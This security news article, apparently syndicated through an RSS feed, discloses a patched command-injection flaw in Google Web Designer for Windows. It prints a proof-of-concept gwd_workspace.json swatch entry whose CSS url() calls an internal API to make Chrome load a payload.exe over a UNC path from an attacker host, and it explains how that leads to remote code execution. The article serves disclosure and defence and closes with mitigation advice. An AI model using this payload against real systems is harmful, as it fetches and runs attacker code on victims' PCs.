By rssfeeds-admin By abusing CSS injection in the document configuration file, attackers can execute arbitrary commands on a victim’s machine via Chrome’s internal API.
Background: CSS Injection in gwd_workspace.json
Google Web Designer stores custom color palettes in gwd_workspace.json, under the color.customColorPalettes array.
Solid colors are parsed safely into RGBA components, but gradient definitions bypass strict sanitization. An attacker can insert arbitrary CSS rules into the css field:
json"color.customColorPalettes": [
{
"name": "evilSwatch",
"color_data": [
{
"css": "-webkit-linear-gradient;background:url('//ninja-shell/api/browser?method=open&usedefaultapp=false&browser=chrome&url=//%22%20--browser-subprocess-path%3D%5C%5Cattacker.com%5Cpayload.exe%20--headless%20%22')"
}
]
}
]
When the Swatches UI is rendered, this injection triggers a request to the internal ninja-shell API, which bridges the JavaScript application shell to native OS operations.
Command Injection via Internal API
Google Web Designer leverages a REST API at //ninja-shell/api/browser to open URLs in Chrome:
textGET //ninja-shell/api/browser?method=open
&usedefaultapp=false
&browser=chrome
&url=https%3A%2F%2Faccounts.google.com%2F...
Because the url parameter is not properly escaped, an attacker can break out of the quoted argument and append additional flags.
For example, injecting %22 --browser-subprocess-path=%5C%5Cbalintmagyar.com%5Cpayload.exe --headless %22 causes Chrome to launch with:
textchrome.exe "//" --browser-subprocess-path=\balintmagyar.compayload.exe --headless ""
By hosting payload.exe On a WebDAV server and referencing it via a UNC path, Windows will fetch and execute the payload transparently, achieving full RCE when a user clicks the custom swatch.
Impact and Mitigation
This vulnerability (CWE-78) affects Google Web Designer for Windows builds before 16.4.0.0711 (released July 29, 2025).
macOS and Linux versions are not exploitable due to differing subprocess handling.
A successful attack requires minimal user interaction: opening a malicious ad document and selecting the Swatches option in the color picker.
Google’s Vulnerability Reward Program awarded $3,500 for this submission. Users should update to version 16.4.0.0711 or later, which enforces strict sanitization of gradient definitions and properly escapes command-line arguments for the internal API.
Security teams are advised to audit any custom gwd_workspace.json files for unexpected url() or gradient rules and to restrict network file share access where possible.
With this discovery, Magyar highlights the latent risks of intermixing native and web components in modern applications.
While CSS injection rarely escalates to code execution, this chain of vulnerabilities underscores the importance of rigorous input validation and sandboxing of internal APIs.
Continuous review of third-party tools remains essential to maintaining a secure development and publishing pipeline.
Find this Story Interesting! Follow us on Google News , LinkedIn and X to Get More Instant Updates
The post Google Web Designer Vulnerability Could Let Hackers Take Control of PCs appeared first on Cyber Security News.
Discover more from RSS Feeds Cloud
Subscribe to get the latest posts sent to your email.